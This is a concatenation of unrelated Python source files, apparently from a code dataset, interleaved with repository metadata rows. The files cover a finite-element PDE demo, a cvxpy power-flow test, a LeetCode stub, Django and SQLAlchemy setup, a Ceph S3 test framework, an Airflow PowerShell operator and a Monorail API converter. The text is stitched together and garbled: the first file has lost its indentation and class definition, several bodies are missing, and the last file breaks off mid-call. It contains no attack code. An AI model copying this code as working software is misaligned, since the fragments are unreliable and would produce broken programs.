Created on Mon Apr 13 14:57:32 2020
@author: Nicolai
"""
import sys
import os
importpath = os.path.dirname(os.path.realpath(__file__)) + "/../"
sys.path.append(importpath)
from FemPdeBase import FemPdeBase
import numpy as np
# import from ngsolve
import ngsolve as ngs
from netgen.geom2d import unit_square
import time
import psutil
import gc
if __name__ == "__main__":
fempde1 = FemPde1(True)
print(fempde1.pde_string)
try:
fempde1.exact(np.array([0.5,0.5]))
except:
print(" error message above")
try:
fempde1.approx(np.array([0.5,0.5]))
except:
print(" error message above")
fempde1.solve()
print("-------------------------------------")
print("exact(0.5, 0.5) = {}".format(fempde1.exact(np.array([0.5,0.5]))))
print("approx(0.5, 0.5) = {}".format(fempde1.approx(np.array([0.5,0.5]))))
print("L2 norm to the real solution {}".format(fempde1.normL2()))
print("solving took {} sec".format(fempde1.exec_time))
print("solving uses {} Mb".format(fempde1.mem_consumption/1000000))
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.exact(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
fig.tight_layout()
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0, X1)")
plt.show()
fig.savefig("sol_pde_1.pdf", bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.approx(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0,X1)")
plt.show()
| 31.695473 | 199 | 0.532849 |
6a20c03889abf01d98da2c14b133084ab0890d44
| 3,324 |
py
|
Python
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
jasondark/cvxpy
|
56aaa01b0e9d98ae5a91a923708129a7b37a6f18
|
[
"ECL-2.0",
"Apache-2.0"
] | 38 |
2015-10-16T16:55:28.000Z
|
2022-02-16T05:06:01.000Z
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
h-vetinari/cvxpy
|
86307f271819bb78fcdf64a9c3a424773e8269fa
|
[
"ECL-2.0",
"Apache-2.0"
] | 28 |
2015-09-16T16:33:23.000Z
|
2021-11-23T07:31:44.000Z
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
h-vetinari/cvxpy
|
86307f271819bb78fcdf64a9c3a424773e8269fa
|
[
"ECL-2.0",
"Apache-2.0"
] | 21 |
2015-09-16T14:56:16.000Z
|
2022-02-16T05:06:03.000Z
|
import numpy as np
from cvxpy import *
import copy
import time
# data for power flow problem
import numpy as np
n = 12 # total number of nodes
m = 18 # number of edges (transmission lines)
k = 4 # number of generators
TIME = 0
# transmission line capacities
Pmax = np.matrix("""
4.8005,
1.9246,
3.4274,
2.9439,
4.5652,
4.0484,
2.8259,
1.0740,
4.2856,
2.7788,
3.4617,
4.1677,
4.6873,
3.9528,
1.7051,
2.6228,
4.7419,
4.6676,
""")
Gmax = np.matrix("3; 2; 4; 7") # maximum generator power
c = np.matrix("4; 8; 5; 3") # supply generator costs
d = np.matrix("""
1.6154
2.3405
1.0868
1.5293
2.2197
1.0148
1.2083
1.3041
""")# network power demands
# graph incidence matrix
A = np.matrix(""" -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 -1 -1 0 0 0 0 0 0 -1 ;
0 0 0 0 0 0 -1 0 0 0 0 0 0 0 -1 0 -1 0 ;
1 0 0 0 1 -1 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 1 1 0 -1 0 1 -1 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 1 0 0 0 0 -1 1 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 1 1 0 0 0 -1 0 1 0 0 1 ;
0 0 0 0 0 0 0 0 0 0 1 -1 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 1 1 -1 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 ;
0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 -1 1 0
""")
g = Variable(k)
p = Variable(m)
obj = Minimize(c.T*g)
constraints = [A*p == vstack(-g, d.T), abs(p) <= Pmax.T, 0 <= g, g <= Gmax]
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# N - 1 contingency
g = Variable(k)
flows = []
obj = Minimize(c.T*g)
for i in range(m):
flows.append(Variable(m))
constraints = [g <= Gmax, 0 <= g]
for i in range(m): # N -1 redundancy
constraints.append(A*flows[i] == vstack(-g, d.T))
constraints.append( flows[i][i] == 0 )
constraints.append( abs(flows[i]) <= Pmax.T )
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# the code below is not data for the problem
# it is used only to generate the network graph
# x-y coordinates
# each row is node x-y coordinates
XY = np.matrix("""
1.5 5.2;
4.9 5;
6.9 3.5;
1.9 3.5;
0.2 4.4;
3.2 4.8;
5.9 4.5;
3.9 3.6;
5.9 2.5;
3.9 3;
1.4 2.5;
0 3
""");
# node adjacency matrix
Ad = -A*A.T
Ad = Ad - np.diag(np.diag(Ad))
epsx = 0.05; epsy = 0.15; # text placing offset
# plotting
import matplotlib.pyplot as plt
for i in range(12): #plot edges
for j in range(i):
if Ad[i,j] == 1:
pass #plt.plot((XY[i,0], XY[j,0]), (XY[i,1], XY[j,1]), 'k-')
for j in range(k): #plot nodes
pass #plt.plot(XY[j,0],XY[j,1],'rs', markersize=12)
pass #plt.text(XY[j,0]-epsx,XY[j,1]+epsy,str(j+1))
for j in range(k,n):
pass #plt.plot(XY[j,0],XY[j,1],'ko')
pass #plt.axis('off')
pass #plt.savefig('pwr_net.eps')
if __name__ == '__main__':
pass #plt.show()
| 23.083333 | 75 | 0.513538 |
6a213e8a5b6a8886b1f3aeab6a75af090df46ca9
| 996 |
py
|
Python
|
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/530 Minimum Absolute Difference in BST.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
# Binary Search Tree
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
#
# Example:
#
# Input:
#
# 1
# \
# 3
# /
# 2
#
# Output:
# 1
#
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
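# The solution body is missing from this dump. A minimal sketch of the usual
# approach: an in-order traversal visits BST values in sorted order, so the
# answer is the smallest gap between consecutive visited values. The class
# below is an assumed reconstruction, not the repository's original code.
class Solution:
    def getMinimumDifference(self, root):
        self.prev = None            # value of the previously visited node
        self.best = float('inf')    # smallest gap seen so far

        def inorder(node):
            if node is None:
                return
            inorder(node.left)
            if self.prev is not None:
                self.best = min(self.best, node.val - self.prev)
            self.prev = node.val
            inorder(node.right)

        inorder(root)
        return self.best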
| 23.162791 | 124 | 0.566265 |
6a240de4a4b62bd30eb577321f80af837069962e
| 2,029 |
py
|
Python
|
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
backends/search/__init__.py
|
dev-easyshares/company
|
61842839121f308619c59a8f52ab76c8b9dcdd30
|
[
"MIT"
] | null | null | null |
from company.choices import fr as choices
from mighty.errors import BackendError
import datetime, logging
logger = logging.getLogger(__name__)
CHOICES_APE = dict(choices.APE)
CHOICES_LEGALFORM = dict(choices.LEGALFORM)
CHOICES_SLICE = dict(choices.SLICE_EFFECTIVE)
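# The search-backend classes were truncated in this dump. A hedged helper of
# the kind these lookup dicts support -- resolving a raw code to its display
# label, falling back to the code itself. Purely illustrative.
def label_for(choices, code):
    return choices.get(code, code)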
| 31.215385 | 90 | 0.670281 |
6a24c49a2e92d735c1970a4ba7a5a35023549f08
| 504 |
py
|
Python
|
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
app/database/database.py
|
luisornelasch/melp
|
82ff5c84d0df866ee64da10b96f61400c0809845
|
[
"MIT"
] | null | null | null |
from sqlalchemy import create_engine, engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
SQLALCHEMY_DATABASE_URL = os.getenv("DATABASE_URL").replace("postgres://", "postgresql+psycopg2://")
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
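# Typical session-per-request helper used with this setup (e.g. as a FastAPI
# dependency). Not shown in the original file -- a hedged sketch assuming the
# standard SQLAlchemy session lifecycle.
def get_db():
    db = SessionLocal()
    try:
        yield db
    finally:
        db.close()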
| 24 | 100 | 0.753968 |
6a25b6baad0282a34406b60b6191667dfe9a128b
| 13,698 |
py
|
Python
|
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
ragweed/framework.py
|
soumyakoduri/ragweed
|
7d4a729ff761fe1ca073b7ceade46acf1321e9fd
|
[
"MIT"
] | null | null | null |
import sys
import os
import boto
import boto.s3.connection
import json
import inspect
import pickle
import bunch
import yaml
import ConfigParser
import rados
from boto.s3.key import Key
from nose.plugins.attrib import attr
from nose.tools import eq_ as eq
from .reqs import _make_admin_request
ragweed_env = None
suite = None
def rtest_decode_json(d):
if '__pickle' in d:
return pickle.loads(str(d['__pickle']))
return d
def read_config(fp):
config = bunch.Bunch()
g = yaml.safe_load_all(fp)
for new in g:
print bunch.bunchify(new)
config.update(bunch.bunchify(new))
return config
str_config_opts = [
'user_id',
'access_key',
'secret_key',
'host',
'ceph_conf',
'bucket_prefix',
]
int_config_opts = [
'port',
]
bool_config_opts = [
'is_secure',
]
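# The config-parsing code that consumes these typed option lists was truncated
# in this dump. A hedged sketch of how such lists are typically applied to a
# ConfigParser instance; the section wiring is an assumption.
def apply_typed_opts(parser, section, config):
    for opt in str_config_opts:
        if parser.has_option(section, opt):
            config[opt] = parser.get(section, opt)
    for opt in int_config_opts:
        if parser.has_option(section, opt):
            config[opt] = parser.getint(section, opt)
    for opt in bool_config_opts:
        if parser.has_option(section, opt):
            config[opt] = parser.getboolean(section, opt)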
| 29.649351 | 141 | 0.593663 |
6a27987a8cba79e77e7ec06fe0349b417f6ae225
| 44 |
py
|
Python
|
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | null | null | null |
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | 1 |
2018-05-28T10:35:02.000Z
|
2018-05-28T10:35:02.000Z
|
exposing/_version.py
|
w4k2/exposing
|
6abbced18aa567ed45426ba915f3b56e7aeca028
|
[
"BSD-3-Clause"
] | null | null | null |
"""
``exposing``
"""
__version__ = '0.2.2'
| 7.333333 | 21 | 0.5 |
6a27b2bcfa7e4d8b0487cdb6693479a656fd6bb3
| 136 |
py
|
Python
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 5 |
2019-10-14T05:48:43.000Z
|
2021-08-29T17:42:48.000Z
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 26 |
2019-09-19T08:51:45.000Z
|
2022-03-12T00:05:29.000Z
|
opensteer/teams/admin.py
|
reckonsys/opensteer
|
3c47bcf0a8de8e363ce8cced02827fe21a0d406a
|
[
"MIT"
] | 1 |
2020-01-08T21:50:05.000Z
|
2020-01-08T21:50:05.000Z
|
from django.contrib import admin
from opensteer.teams.models import Team, Member
admin.site.register(Team)
admin.site.register(Member)
| 22.666667 | 47 | 0.823529 |
6a2905a1e278bec5cf1d153f6d2fadf970789157
| 2,657 |
py
|
Python
|
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | 3 |
2021-12-20T00:43:28.000Z
|
2022-03-12T00:54:42.000Z
|
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
ozora-ogino/tflite-human-tracking
|
d1be51c628e1464b5e2953a611df6e974a9ffbaa
|
[
"MIT"
] | 5 |
2021-12-03T08:59:18.000Z
|
2022-03-17T11:25:38.000Z
|
from src.utils import check_direction, direction_config, is_intersect
# pylint:disable=unexpected-keyword-arg
| 42.174603 | 90 | 0.530297 |
6a296c2965af2f5264f62e16fe377851c022b76e
| 44 |
py
|
Python
|
scpp_base/scpp_base/src/db/__init__.py
|
scorelab/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 4 |
2018-10-02T06:31:18.000Z
|
2019-11-16T15:21:34.000Z
|
scpp_base/scpp_base/src/db/__init__.py
|
horizon00/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 2 |
2017-12-06T11:54:14.000Z
|
2019-11-11T11:34:06.000Z
|
scpp_base/scpp_base/src/db/__init__.py
|
horizon00/social-currency
|
f539893104bdfe098cfa58c8d9fabcbb00874c52
|
[
"Apache-2.0"
] | 5 |
2017-02-27T10:10:41.000Z
|
2019-11-11T11:45:37.000Z
|
__all__ = ["db_handler", "coin_value_handler"]
| 44 | 44 | 0.772727 |
6a29d2f85143afe8ae63f5fd3499c691c4db69b3
| 2,792 |
py
|
Python
|
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
test/test_parameter_set.py
|
crest-cassia/caravan_search_engine
|
5c3bd3176b44e8c3145ba67b4240678e18a1394e
|
[
"MIT"
] | null | null | null |
import unittest
from caravan.tables import Tables
from caravan.parameter_set import ParameterSet
if __name__ == '__main__':
unittest.main()
| 36.736842 | 71 | 0.609599 |
6a29e328b66b3aa40c02b6c801e1beb3b20cffb7
| 1,470 |
py
|
Python
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 33 |
2021-02-01T15:49:37.000Z
|
2021-12-20T00:44:43.000Z
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 46 |
2021-02-03T12:56:52.000Z
|
2021-12-19T18:50:27.000Z
|
tests/unit/transport/s3/test_settings.py
|
TinkoffCreditSystems/overhave
|
b0ab705ef5c5c5a65fa0b14b173b64fd7310e187
|
[
"Apache-2.0"
] | 1 |
2021-12-07T09:02:44.000Z
|
2021-12-07T09:02:44.000Z
|
import pytest
from pydantic import ValidationError
from overhave.transport import OverhaveS3ManagerSettings
| 39.72973 | 88 | 0.742857 |
6a2a3c06f511758a8f808e719520fdb3ebac69cd
| 15,015 |
py
|
Python
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | 4 |
2017-10-05T19:34:32.000Z
|
2021-05-18T23:29:44.000Z
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | 2 |
2018-03-30T22:38:17.000Z
|
2018-03-30T22:39:13.000Z
|
examples/elCmd.py
|
mark-nicholson/python-editline
|
c23f1071c4b832a92f66e2f49142e5c5f00e500d
|
[
"BSD-3-Clause"
] | null | null | null |
"""A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
"""
import string, sys
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
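# The Cmd class body and the original MyCmd demo were truncated in this dump.
# Below is a minimal, assumed sketch of a subclass following the do_*/help_*
# conventions described in the module docstring; 'Cmd' is taken to be the
# class defined in the original file, and do_greet is purely illustrative.
class MyCmd(Cmd):
    def do_greet(self, line):
        """Demonstrate the do_foo dispatch convention."""
        sys.stdout.write('hello, %s\n' % line)

    def do_EOF(self, line):
        """End of file on input exits the command loop (convention 1)."""
        return True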
if __name__ == '__main__':
mc = MyCmd()
mc.cmdloop()
| 35.75 | 79 | 0.556777 |
6a2bc3b1189d8cb91dbce9466649429945439058
| 1,127 |
py
|
Python
|
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | null | null | null |
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | null | null | null |
ecommerce-website/orders/admin.py
|
Shanu85/FCS_Project
|
def3437d58b4d2ff00e26c0a5ca769af66eccfad
|
[
"MIT"
] | 1 |
2022-01-03T13:40:11.000Z
|
2022-01-03T13:40:11.000Z
|
from django.contrib import admin
from .models import Order, receiverInfo
| 35.21875 | 92 | 0.696539 |
6a2bdc47419473e5c8f04286a711270211d71607
| 2,513 |
py
|
Python
|
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/linked_lists/ll-kth-from-end/ll_kth.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
from node import Node
| 25.383838 | 58 | 0.512933 |
6a2be20f58b11b8306e1cbf1b9ec46cf140c201d
| 1,559 |
py
|
Python
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852 |
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371 |
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
MuonAnalysis/MomentumScaleCalibration/test/LikelihoodPdfDBReader_cfg.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240 |
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("LIKELIHOODPDFDBREADER")
# process.load("MuonAnalysis.MomentumScaleCalibration.local_CSA08_Y_cff")
process.source = cms.Source("EmptySource",
numberEventsInRun = cms.untracked.uint32(1),
firstRun = cms.untracked.uint32(1)
)
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cfi")
process.load("Geometry.CommonTopologies.globalTrackingGeometry_cfi")
process.load("RecoMuon.DetLayers.muonDetLayerGeometry_cfi")
process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
process.load("RecoMuon.TrackingTools.MuonServiceProxy_cff")
# process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring()
# )
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.poolDBESSource = cms.ESSource("PoolDBESSource",
BlobStreamerName = cms.untracked.string('TBufferBlobStreamingService'),
DBParameters = cms.PSet(
messageLevel = cms.untracked.int32(2),
authenticationPath = cms.untracked.string('/afs/cern.ch/cms/DB/conddb')
),
timetype = cms.untracked.string('runnumber'),
connect = cms.string('sqlite_file:dummy2.db'),
toGet = cms.VPSet(cms.PSet(
record = cms.string('MuScleFitLikelihoodPdfRcd'),
tag = cms.string('MuScleFitLikelihoodPdf_2_1_12')
))
)
process.LikelihoodPdfDBReaderModule = cms.EDAnalyzer(
"LikelihoodPdfDBReader"
)
process.p1 = cms.Path(process.LikelihoodPdfDBReaderModule)
| 30.568627 | 79 | 0.76331 |
6a2c1076d5d797f1927b5d8d8d4594e8e5c92647
| 9,615 |
py
|
Python
|
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
fast_fine_tuna/fast_fine_tuna.py
|
vinid/fast_fine_tuna
|
2d128f58df0407448cdb2e179972573afa7ac636
|
[
"MIT"
] | null | null | null |
from transformers import AutoModel, AutoModelForSequenceClassification, AutoTokenizer, AutoConfig
from sklearn.model_selection import StratifiedKFold
import numpy as np
import torch
from fast_fine_tuna.dataset import MainDatasetDouble, MainDataset
from transformers import AdamW
from torch.utils.data import DataLoader
import os
from tqdm import tqdm
from fast_fine_tuna.models import MiniModel
from torch import nn
| 40.914894 | 114 | 0.615081 |
6a2c58ba82079e0bdc04e7b2c1c567a97cd9075d
| 451 |
py
|
Python
|
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | 1 |
2019-10-01T12:22:38.000Z
|
2019-10-01T12:22:38.000Z
|
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | null | null | null |
Message/Message.py
|
gauravyeole/KVstoreDB
|
1c7c83b158e95daec998fba62a89fa1211a05089
|
[
"MIT"
] | null | null | null |
# Message class Implementation
# @author: Gaurav Yeole <[email protected]>
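# The class body is missing from this dump. A generic, assumed sketch of a
# message wrapper for a KV store; both field names below are hypothetical.
class Message:
    def __init__(self, msg_type, payload):
        self.msg_type = msg_type  # hypothetical: e.g. 'GET', 'PUT', 'REPLY'
        self.payload = payload    # hypothetical: request/response body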
| 20.5 | 49 | 0.569845 |
6a2db7981b57ab2addb91eebdfdaf255263aca79
| 230 |
py
|
Python
|
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
wpt/websockets/websock_handlers/open_delay_wsh.py
|
gsnedders/presto-testo
|
a0acfbef13a3f8cae67cc7145216d31b67aa8eb4
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
from mod_pywebsocket import msgutil
import time
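# The handler bodies were truncated in this dump. A hedged sketch of the two
# hooks a mod_pywebsocket *_wsh.py handler defines; judging by the filename,
# the original delayed the open handshake -- the 3-second value is assumed.
def web_socket_do_extra_handshake(request):
    time.sleep(3)  # assumed delay before the connection is considered open

def web_socket_transfer_data(request):
    # echo until the peer closes; the original transfer logic is unknown
    while True:
        line = msgutil.receive_message(request)
        msgutil.send_message(request, line)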
| 19.166667 | 43 | 0.795652 |
6a2f97206c5b9ec5564b46970658837924dcfae3
| 2,404 |
py
|
Python
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 |
2021-06-26T13:37:35.000Z
|
2022-01-11T15:49:44.000Z
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 33 |
2021-07-25T10:29:30.000Z
|
2022-03-30T04:39:06.000Z
|
airflow/providers/microsoft/psrp/operators/psrp.py
|
augusto-herrmann/airflow
|
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import TYPE_CHECKING, List, Optional, Sequence
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.microsoft.psrp.hooks.psrp import PSRPHook
if TYPE_CHECKING:
from airflow.utils.context import Context
| 34.342857 | 89 | 0.687604 |
6a2fb0bff9f0be5443177122a457a61eac9dfba3
| 17,104 |
py
|
Python
|
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | 1 |
2018-01-02T05:47:07.000Z
|
2018-01-02T05:47:07.000Z
|
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/monorail/services/api_pb2_v1_helpers.py
|
mithro/chromium-infra
|
d27ac0b230bedae4bc968515b02927cf9e17c2b7
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Convert Monorail PB objects to API PB objects"""
import datetime
import logging
import time
from framework import framework_constants
from framework import framework_helpers
from framework import permissions
from framework import timestr
from proto import api_pb2_v1
from proto import project_pb2
from proto import tracker_pb2
from services import issue_svc
from services import project_svc
from services import user_svc
from tracker import tracker_bizobj
from tracker import tracker_helpers
def convert_project(project, config, role):
"""Convert Monorail Project PB to API ProjectWrapper PB."""
return api_pb2_v1.ProjectWrapper(
kind='monorail#project',
